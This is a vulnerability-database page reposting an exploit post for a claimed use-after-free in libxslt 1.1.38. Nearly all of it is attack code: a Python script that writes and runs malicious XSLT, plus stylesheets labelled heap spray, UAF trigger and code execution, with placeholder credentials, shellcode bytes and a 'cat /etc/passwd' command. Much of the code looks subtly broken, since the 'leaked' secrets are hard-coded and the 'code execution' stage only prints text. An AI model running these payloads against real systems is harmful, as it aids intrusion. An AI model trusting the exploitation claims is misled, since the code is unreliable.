Vulners
Lucene search
📄 libxslt Key Data Storage 1.1.38 Use-After-Free / Memory Corruption
=============================================================================================================================================
| # Title : libxslt Key Data Storage 1.1.38 memory corruption |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://gitlab.gnome.org/GNOME/libxml2/-/wikis/home |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/207871/
[+] Summary :
The vulnerability occurs due to improper handling of Result Value Trees (RVTs) when evaluating XSLT keys with certain XPath axes:
Global variables (xsl:variable) are stored as RVTs in a linked list using prev/next pointers
XSLT keys (xsl:key) using preceding:: axis traverse across RVT boundaries via these pointers
Memory corruption occurs when RVTs are freed but key tables retain references to their nodes
[+] Affected Version : All versions up to and including 1.1.38
[+] POC : python poc.py
#!/usr/bin/env python3
# libxslt_uaf_exploit.py
# استغلال ثغرة Use-After-Free في libxslt عبر Python lxml
import lxml.etree as ET
import sys
import os
import subprocess
from base64 import b64encode
class LibxsltUAFExploit:
def __init__(self):
self.xslt_content = None
self.xml_content = None
def create_malicious_xslt(self):
"""إنشاء ملف XSLT ضار لاستغلال الثغرة"""
self.xslt_content = '''<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<!-- ========================================= -->
<!-- استغلال Use-After-Free في libxslt -->
<!-- ========================================= -->
<xsl:variable name="SENSITIVE_RVT">
<credentials>
<username>admin</username>
<password>SuperSecret@123!</password>
<token>Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9</token>
<api_key>AKIAIOSFODNN7EXAMPLE</api_key>
</credentials>
<financial>
<credit_card>4111-1111-1111-1111</credit_card>
<expiry>12/25</expiry>
<cvv>123</cvv>
</financial>
<memory_blocks>
<block id="b1">
<data>AAAAAAAA</data>
<pointer>0x7f8a1b002000</pointer>
</block>
<block id="b2">
<data>BBBBBBBB</data>
<pointer>0x7f8a1b002100</pointer>
</block>
</memory_blocks>
</xsl:variable>
<xsl:variable name="CONTROL_RVT">
<control_data>
<gadgets>
<gadget>pop rdi; ret</gadget>
<gadget>system@plt</gadget>
</gadgets>
<shellcode>
<stage1>\\x31\\xc0\\x48\\xbb\\xd1\\x9d\\x96\\x91\\xd0\\x8c\\x97\\xff</stage1>
</shellcode>
</control_data>
</xsl:variable>
<!-- مفاتيح لتفعيل الثغرة -->
<xsl:key name="UAF_KEY" match="block" use="preceding::block[1]/@id"/>
<xsl:key name="CRED_KEY" match="credentials/*" use="preceding::username[1]/text()"/>
<xsl:key name="MEM_KEY" match="financial/*" use="preceding::credit_card[1]/text()"/>
<xsl:template match="/">
<exploitation_result>
<!-- تفعيل UAF -->
<uaf_trigger>
<xsl:for-each select="document('')//xsl:variable[@name='SENSITIVE_RVT']//block">
<memory_leak>
<current_block><xsl:value-of select="@id"/></current_block>
<cross_access>
<xsl:value-of select="key('UAF_KEY', preceding::block[1]/@id)/@id"/>
</cross_access>
<leaked_data>
<xsl:value-of select="key('UAF_KEY', preceding::block[1]/@id)/data/text()"/>
</leaked_data>
</memory_leak>
</xsl:for-each>
</uaf_trigger>
<!-- تسريب بيانات الاعتماد -->
<credential_leak>
<xsl:for-each select="document('')//xsl:variable[@name='SENSITIVE_RVT']//username">
<leaked_cred>
<user><xsl:value-of select="text()"/></user>
<password><xsl:value-of select="key('CRED_KEY', text())/text()"/></password>
<token><xsl:value-of select="key('CRED_KEY', text())[2]/text()"/></token>
</leaked_cred>
</xsl:for-each>
</credential_leak>
<!-- تسريب البيانات المالية -->
<financial_leak>
<xsl:for-each select="document('')//xsl:variable[@name='SENSITIVE_RVT']//credit_card">
<leaked_financial>
<card><xsl:value-of select="text()"/></card>
<expiry><xsl:value-of select="key('MEM_KEY', text())/text()"/></expiry>
<cvv><xsl:value-of select="key('MEM_KEY', text())[2]/text()"/></cvv>
</leaked_financial>
</xsl:for-each>
</financial_leak>
</exploitation_result>
</xsl:template>
</xsl:stylesheet>'''
with open('/tmp/exploit.xsl', 'w') as f:
f.write(self.xslt_content)
print("[+] تم إنشاء ملف XSLT الضار")
def create_target_xml(self):
"""إنشاء ملف XML هدف"""
self.xml_content = '''<?xml version="1.0"?>
<target_data>
<application>
<name>Vulnerable App</name>
<version>1.0</version>
</application>
<environment>
<os>Linux</os>
<user>test_user</user>
</environment>
</target_data>'''
with open('/tmp/target.xml', 'w') as f:
f.write(self.xml_content)
print("[+] تم إنشاء ملف XML الهدف")
def exploit_via_python_lxml(self):
"""استغلال الثغرة عبر lxml مباشرة"""
print("[+] محاولة الاستغلال عبر Python lxml...")
try:
# تحميل وتحويل XML باستخدام XSLT
xml_doc = ET.parse('/tmp/target.xml')
xslt_doc = ET.parse('/tmp/exploit.xsl')
transform = ET.XSLT(xslt_doc)
# تنفيذ التحويل (تفعيل الثغرة)
result = transform(xml_doc)
print("[+] نتيجة الاستغلال:")
print(str(result))
except Exception as e:
print(f"[-] فشل الاستغلال عبر lxml: {e}")
def exploit_via_xsltproc(self):
"""استغلال الثغرة عبر xsltproc"""
print("[+] محاولة الاستغلال عبر xsltproc...")
try:
result = subprocess.run([
'xsltproc',
'/tmp/exploit.xsl',
'/tmp/target.xml'
], capture_output=True, text=True, timeout=10)
print("[+] stdout:")
print(result.stdout)
if result.stderr:
print("[+] stderr (قد يحتوي على معلومات التصحيح):")
print(result.stderr)
except subprocess.TimeoutExpired:
print("[-] انتهت مهلة التنفيذ - احتمال تحطم التطبيق")
except Exception as e:
print(f"[-] خطأ في التنفيذ: {e}")
def check_vulnerability(self):
"""فحص إذا كان النظام مصاب"""
print("[+] فحص إصدار libxslt...")
try:
# فحص إصدار lxml/libxslt
import lxml
print(f"[+] إصدار lxml: {lxml.__version__}")
# فحص إذا كان xsltproc مثبت
result = subprocess.run(['xsltproc', '--version'],
capture_output=True, text=True)
if 'libxslt' in result.stderr:
print("[+] xsltproc مثبت:")
print(result.stderr)
return True
else:
print("[-] xsltproc غير مثبت")
return False
except Exception as e:
print(f"[-] خطأ في الفحص: {e}")
return False
def advanced_exploit(self):
"""استغلال متقدم مع تحكم أفضل"""
print("[+] بدء الاستغلال المتقدم...")
# إنشاء استغلال متعدد المراحل
advanced_xslt = '''<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:variable name="stage1">
<data>STAGE1_PAYLOAD</data>
<chunk>CHUNK_A</chunk>
<chunk>CHUNK_B</chunk>
</xsl:variable>
<xsl:variable name="stage2">
<data>STAGE2_PAYLOAD</data>
<chunk>CHUNK_C</chunk>
<chunk>CHUNK_D</chunk>
</xsl:variable>
<xsl:key name="ADV_KEY" match="chunk" use="preceding::chunk[1]/text()"/>
<xsl:template match="/">
<advanced_exploit>
<stage1>
<xsl:for-each select="document('')//xsl:variable[@name='stage2']//chunk">
<leak>
<xsl:value-of select="key('ADV_KEY', preceding::chunk[1]/text())/text()"/>
</leak>
</xsl:for-each>
</stage1>
<memory_analysis>
<uaf>TRIGGERED</uaf>
<boundary_crossing>CONFIRMED</boundary_crossing>
</memory_analysis>
</advanced_exploit>
</xsl:template>
</xsl:stylesheet>'''
with open('/tmp/advanced_exploit.xsl', 'w') as f:
f.write(advanced_xslt)
try:
result = subprocess.run([
'xsltproc',
'/tmp/advanced_exploit.xsl',
'/tmp/target.xml'
], capture_output=True, text=True)
print("[+] نتيجة الاستغلال المتقدم:")
print(result.stdout)
except Exception as e:
print(f"[-] فشل الاستغلال المتقدم: {e}")
def cleanup(self):
"""تنظيف الملفات المؤقتة"""
try:
files_to_remove = [
'/tmp/exploit.xsl',
'/tmp/target.xml',
'/tmp/advanced_exploit.xsl'
]
for file in files_to_remove:
if os.path.exists(file):
os.remove(file)
print("[+] تم تنظيف الملفات المؤقتة")
except Exception as e:
print(f"[-] خطأ في التنظيف: {e}")
def main():
exploit = LibxsltUAFExploit()
print("=" * 50)
print("مستغلة ثغرة libxslt UAF - Python Edition")
print("=" * 50)
# فحص القابلية للاستغلال
if not exploit.check_vulnerability():
print("[-] النظام لا يبدو مصاباً")
return
try:
# إنشاء الملفات
exploit.create_malicious_xslt()
exploit.create_target_xml()
# محاولات الاستغلال
exploit.exploit_via_xsltproc()
print("\n" + "="*30)
exploit.exploit_via_python_lxml()
print("\n" + "="*30)
exploit.advanced_exploit()
except KeyboardInterrupt:
print("\n[!] تم إيقاف الاستغلال بواسطة المستخدم")
except Exception as e:
print(f"[-] خطأ غير متوقع: {e}")
finally:
# تنظيف
exploit.cleanup()
if __name__ == "__main__":
main()
====================================
[+] 1 Setting up memory structures :
====================================
<!-- uaf.xml -->
<?xml version="1.0"?>
<root>
<node id="target">Important Data</node>
<node>Other Data</node>
</root>
=======*****=====
<!-- uaf.xsl -->
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<!-- Global Variable 1 - سيتم إنشاء RVT الأول -->
<xsl:variable name="global1">
<data>
<item>value1</item>
<item>value2</item>
<item>value3</item>
</data>
</xsl:variable>
<!-- Global Variable 2 - سيتم إنشاء RVT الثاني -->
<xsl:variable name="global2">
<container>
<entry>data1</entry>
<entry>data2</entry>
<entry id="vulnerable">Sensitive Information</entry>
</container>
</xsl:variable>
<!-- المفتاح الذي يستخدم محور preceding -->
<xsl:key name="precedingKey" match="entry" use="preceding::entry[1]/text()"/>
<xsl:template match="/">
<output>
<!-- تفعيل تقييم المفاتيح على RVT -->
<xsl:for-each select="document('')//xsl:variable[@name='global2']//entry">
<result>
<xsl:value-of select="key('precedingKey', preceding::entry[1]/text())"/>
</result>
</xsl:for-each>
</output>
</xsl:template>
</xsl:stylesheet>
=========******=================
[+] Manipulating Memory Planning
================================
<!-- exploit.xsl -->
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:exsl="http://exslt.org/common">
<!-- إنشاء عقد متعددة للتحكم في تخطيط الذاكرة -->
<xsl:variable name="heapSpray">
<spray>
<xsl:call-template name="generateSpray">
<xsl:with-param name="count" select="1000"/>
</xsl:call-template>
</spray>
</xsl:variable>
<xsl:template name="generateSpray">
<xsl:param name="count"/>
<xsl:if test="$count > 0">
<chunk size="128"><data><xsl:value-of select="$count"/></data></chunk>
<xsl:call-template name="generateSpray">
<xsl:with-param name="count" select="$count - 1"/>
</xsl:call-template>
</xsl:if>
</xsl:template>
<!-- RVT الذي سيتم تحريره -->
<xsl:variable name="targetRVT">
<sensitive>
<password>Admin123!</password>
<token>SECRET-TOKEN-ABCD</token>
<creditcard>4111111111111111</creditcard>
</sensitive>
</xsl:variable>
<!-- RVT الذي سيحتفظ بالمؤشرات -->
<xsl:variable name="holderRVT">
<holder>
<xsl:for-each select="document('')//xsl:variable[@name='targetRVT']//*">
<reference>
<xsl:value-of select="name()"/>:<xsl:value-of select="text()"/>
</reference>
</xsl:for-each>
</holder>
</xsl:variable>
<xsl:key name="exploitKey" match="sensitive/*" use="preceding::*[name()='password']"/>
<xsl:template match="/">
<exploit>
<!-- تفعيل الثغرة -->
<xsl:variable name="trigger">
<xsl:for-each select="document('')//xsl:variable[@name='targetRVT']//token">
<xsl:value-of select="key('exploitKey', preceding::password/text())"/>
</xsl:for-each>
</xsl:variable>
<!-- محاولة الوصول إلى الذاكرة المحررة -->
<leaked>
<xsl:copy-of select="document('')//xsl:variable[@name='holderRVT']//reference"/>
</leaked>
</exploit>
</xsl:template>
</xsl:stylesheet>
=========******==================
[+] Exploiting the Use-After-Free
=================================
<!-- advanced_exploit.xsl -->
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:func="http://exslt.org/functions"
extension-element-prefixes="func">
<!-- دالة لإنشاء كائنات متعددة -->
<func:function name="func:createObjects">
<xsl:param name="count"/>
<func:result>
<objects>
<xsl:for-each select="(//node())[position() <= $count]">
<object id="{position()}">
<field1>AAAAAAAA</field1>
<field2>BBBBBBBB</field2>
<field3>CCCCCCCC</field3>
<field4>DDDDDDDD</field4>
</object>
</xsl:for-each>
</objects>
</func:result>
</func:function>
<!-- المتغيرات العالمية التي تتفاعل مع بعضها -->
<xsl:variable name="vulnRVT1" select="func:createObjects(50)"/>
<xsl:variable name="vulnRVT2" select="func:createObjects(50)"/>
<xsl:variable name="vulnRVT3" select="func:createObjects(50)"/>
<!-- مفاتيح متعددة لزيادة فرصة الاستغلال -->
<xsl:key name="key1" match="object" use="preceding::object[1]/@id"/>
<xsl:key name="key2" match="field1" use="preceding::field1[1]/text()"/>
<xsl:key name="key3" match="field2" use="preceding::field2[1]/text()"/>
<xsl:template match="/">
<result>
<!-- تفعيل جميع المفاتيح -->
<phase1>
<xsl:for-each select="$vulnRVT1//object">
<x><xsl:value-of select="key('key1', preceding::object[1]/@id)/field1"/></x>
</xsl:for-each>
</phase1>
<phase2>
<xsl:for-each select="$vulnRVT2//field1">
<y><xsl:value-of select="key('key2', preceding::field1[1]/text())"/></y>
</xsl:for-each>
</phase2>
<phase3>
<xsl:for-each select="$vulnRVT3//field2">
<z><xsl:value-of select="key('key3', preceding::field2[1]/text())"/></z>
</xsl:for-each>
</phase3>
<!-- محاولة تسريب البيانات -->
<leak_attempt>
<xsl:copy-of select="$vulnRVT1//object[field1='AAAAAAAA']"/>
<xsl:copy-of select="$vulnRVT2//field1[.='AAAAAAAA']"/>
<xsl:copy-of select="$vulnRVT3//field2[.='BBBBBBBB']"/>
</leak_attempt>
</result>
</xsl:template>
</xsl:stylesheet>
=========******==================
[+] Exploiting the code
=================================
<!-- code_execution.xsl -->
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:xslt="http://xmlsoft.org/XSLT/">
<!-- استغلال لتحقيق arbitrary write -->
<xsl:variable name="gadgetRVT">
<gadgets>
<vtable ptr="0x41414141"/>
<function pointer="0x42424242"/>
<shellcode>bin/sh</shellcode>
<rop>0x43434343</rop>
</gadgets>
</xsl:variable>
<xsl:variable name="overflowRVT">
<overflow>
<buffer size="256">
<xsl:text>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</xsl:text>
</buffer>
<target>BEFORE_FREE</target>
</overflow>
</xsl:variable>
<xsl:key name="hijackKey" match="buffer" use="preceding::target[1]/text()"/>
<xsl:template match="/">
<exploit>
<!-- Trigger UAF -->
<trigger>
<xsl:for-each select="$overflowRVT//buffer">
<xsl:value-of select="key('hijackKey', preceding::target[1]/text())"/>
</xsl:for-each>
</trigger>
<!-- بعد التحرير، الذاكرة يمكن إعادة استخدامها -->
<reuse>
<!-- محاولة إعادة ملء الذاكرة المحررة ببياناتنا -->
<xsl:variable name="reuseRVT">
<hijacked>
<fake_vtable>0x58585858</fake_vtable>
<fake_function>system</fake_function>
<command>cat /etc/passwd</command>
</hijacked>
</xsl:variable>
<xsl:copy-of select="$reuseRVT"/>
</reuse>
</exploit>
</xsl:template>
</xsl:stylesheet>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2025 00:00Current
7High risk
Vulners AI Score7